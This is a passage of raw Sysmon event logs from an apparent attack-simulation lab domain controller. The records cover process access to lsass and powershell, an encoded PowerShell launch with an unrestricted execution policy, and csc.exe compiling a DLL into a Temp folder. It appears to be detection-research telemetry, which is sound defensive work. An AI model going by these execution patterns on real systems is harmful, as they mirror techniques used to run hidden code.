10341000x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-6439-6064-C802-00000000AD01}50524644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7abfff7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43480(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f0002d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f63a9f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aae(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aae(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4593f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f3665f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43ba1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4376e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43480(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f28366(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f278d8(wow64) 154100x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.220{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.137{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.137{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.0.csMD5=054C0A1487614BA970CB949FA443FFFB,SHA256=6B88C7F565FF6B5879B03F6F3622B596B63D0C76E3EC5751390A446AF187E21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dllMD5=61375BFD46E9983B5E2BD15E199EFB6D,SHA256=29DD67D3DD6C039E8CF1C6383B1E19F798601AD356933016A53B7A17F5AFDF09,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.pdbMD5=F895E1658465172E098A433DEDAB15C5,SHA256=F538CABA87E99A26AB74B9DAD04E7D61C477D40387C17F4CE309B30928349E08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.outMD5=BFD910673FBB71A8E180BDE8128C3F7C,SHA256=2C15D66D586503292D99CAD2C7DF98AD027DAAF7FD14EFA3DE849F72B32C6C2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.cmdlineMD5=EFBBCF217404BFE509DB3E7AB89B5FFE,SHA256=CF596FD71334E23CFBB83641B7ABB695E379C3186B1885DBC28940E6DD653D2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\CSC2D44CB7CC3432D8BD42593E465E72.TMPMD5=97B487B2F9330660F20421213EE10B64,SHA256=BE458053792BA87B1CF8D0A99CAA615A4F0327BE23C4D42673759E127975A3AC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dll2021-03-31 11:59:57.700 23542300x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESC5A9.tmpMD5=687B477666B08C851B2D066954EBAE63,SHA256=FA8D0BC8BA877C6A026C36E4FEE802753DE6413E7B76239F49D4D383201BF17E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CC02-00000000AD01}4852ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESC5A9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 